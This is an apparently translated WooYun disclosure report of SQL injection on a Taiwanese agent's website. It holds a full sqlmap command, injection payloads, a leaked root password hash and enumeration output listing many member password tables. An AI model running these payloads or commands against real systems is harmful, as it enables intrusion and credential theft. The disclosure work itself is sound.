Vulnerability summary

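Bug ID: wooyun-2015-0158888

Title: SQL injection vulnerability on the main site of 東威地政士代書事務所 (DBA privileges + root password + large number of user passwords) (Taiwan region)

Affected vendor: 東威地政士代書事務所

Reporter: 路人甲

Submitted: 2015-12-07 15:21

Fixed: 2016-01-23 15:16

Published: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]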


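Vulnerability details

Disclosure status:

2015-12-07: Details reported to the vendor; awaiting vendor handling
2015-12-10: Vendor confirmed; details disclosed only to the vendor
2015-12-20: Details disclosed to core white hats and experts in related fields
2015-12-30: Details disclosed to regular white hats
2016-01-09: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public

Brief description:

The main site of 東威地政士代書事務所 has a SQL injection vulnerability (DBA privileges + root password + large number of user passwords)

Detailed description:

Address: http://**.**.**.**/faq_detail.html?id=18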

$ python sqlmap.py -u "http://**.**.**.**/faq_detail.html?id=18" -p id --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


current user:    'root@localhost'
current user is DBA: True
database management system users [6]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
database management system users password hashes:
[*] root [2]:
password hash: 77415a8540b5dece
password hash: NULL


Database: lotto
Table: member
[10 entries]
Database: jason
Table: member
[1051 entries]


Database: ilogin
Table: cmember
[610 entries]


Database: kuga
Table: pre_common_member
[2157 entries]


Database: house1688
Table: cmember
[74 entries]

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 2676=2676
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=18 AND (SELECT 5741 FROM(SELECT COUNT(*),CONCAT(0x717a6b7171,(SELECT (ELT(5741=5741,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS
web application technology: PHP 5.2.10, Apache 2.2.8
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [6]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
database management system users password hashes:
[*] root [2]:
password hash: 77415a8540b5dece
password hash: NULL
Database: ace2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| acework | 35 |
| inquire_data | 5 |
| application | 2 |
| inquire | 2 |
| banner | 1 |
| banner_index | 1 |
| button | 1 |
| catebg | 1 |
| cbg | 1 |
| ckey | 1 |
| company | 1 |
| copyright | 1 |
| csstxt | 1 |
| device | 1 |
| fbg | 1 |
| ikey | 1 |
| keywords | 1 |
| mail | 1 |
| mbutton | 1 |
+---------------------------------------+---------+
Database: 7way
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| serv_img | 81 |
| serv | 15 |
| member | 6 |
| serv_kind | 5 |
| banner | 2 |
| device | 2 |
| application | 1 |
| company | 1 |
| copyright | 1 |
| keywords | 1 |
| mail | 1 |
| msn1 | 1 |
| news | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 67906 |
| STATISTICS | 9189 |
| TABLES | 7345 |
| KEY_COLUMN_USAGE | 5077 |
| TABLE_CONSTRAINTS | 4752 |
| SCHEMATA | 167 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| USER_PRIVILEGES | 102 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 28 |
+---------------------------------------+---------+
Database: ace
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| serv_img | 1064 |
| serv | 38 |
| acework | 35 |
| inquire_data | 5 |
| member | 4 |
| serv_kind | 3 |
| application | 2 |
| inquire | 2 |
| news | 2 |
| banner | 1 |
| banner_index | 1 |
| button | 1 |
| catebg | 1 |
| cbg | 1 |
| ckey | 1 |
| company | 1 |
| copyright | 1 |
| csstxt | 1 |
| device | 1 |
| fbg | 1 |
| ikey | 1 |
| keywords | 1 |
| mail | 1 |
| mbutton | 1 |
| mcatebg | 1 |
| mcbg | 1 |
| mfbg | 1 |
| mkey | 1 |
| mpgbg | 1 |
| msn1 | 1 |
| mtfnav | 1 |
| mtitlebg | 1 |
| mtopbg | 1 |
| nkey | 1 |
| pgbg | 1 |
| pkey | 1 |
| skey | 1 |
| special | 1 |
| supplier | 1 |
| tfnav | 1 |
| titlebg | 1 |
| topbg | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: lotto
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: jason
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: icomic
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: icomic
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: ezshop
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ilogin
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: ilogin
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: kuga
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: kuga
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: kuga
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: kuga
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: kuga
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: house1688
Table: usermember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: house1688
Table: cmember
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: house1688
Table: memberuclink
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: spa
Table: memberuclink
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: spa
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: spa
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: spa
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: spa
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: spa
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: spa
Table: cmember
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: preprint
Table: user
[1 column]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| user_password | varchar(255) |
+---------------+--------------+
Database: camping
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: ido
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: ido
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epbbs
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: epbbs
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epbbs
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: epbbs
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epbbs
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: sky
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: web544_u1
Table: web_users
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: web544_u1
Table: web_admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: adweb
Table: m_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: newshulin
Table: userinfo
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: osdog
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: turbo
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: imobi
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: imobi
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: love
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: love
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epromo
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epromo
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: eptest
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: jjdata
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: jjdata
Table: banker_account
[1 column]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| user_passwd | varchar(50) |
+-------------+-------------+
Database: work
Table: sys_user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: ucenter
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: jumping
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: cjhotel
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: ecshop
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
+-----------------+--------------+
Database: ecshop
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: ecshop
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: post
Table: xg_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: iweb9
Table: m_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: i3fresh
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: i3fresh
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: hongpin
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: kss
Table: members
[1 column]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| member_password | varchar(50) |
+-----------------+-------------+
Database: fhk
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: fhk
Table: user
[1 column]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| us_password | varchar(255) |
+-------------+--------------+
Database: wasong
Table: job_member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| pass | varchar(10) |
+--------+-------------+
Database: lucky5
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: n239
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: n239
Table: banker_account
[1 column]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| user_passwd | varchar(50) |
+-------------+-------------+
Database: icars
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: icars
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: km
Table: yogaclass_member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: km
Table: yogaclass_account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epdiscuz
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: epdiscuz
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: epdiscuz
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: gobalb2b
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: gobalb2b
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ieshop
Table: ecm_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: yuanguan
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: crm
Table: customer
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: crm
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: lotto
Table: member
[10 entries]
Database: jason
Table: member
[1051 entries]
Database: icomic
Table: member
[4672 entries]

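Remediation:

Deploy a WAF.

Copyright notice: when reprinting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-10 01:47

Vendor reply:

Thank you for the report.

Latest status:

None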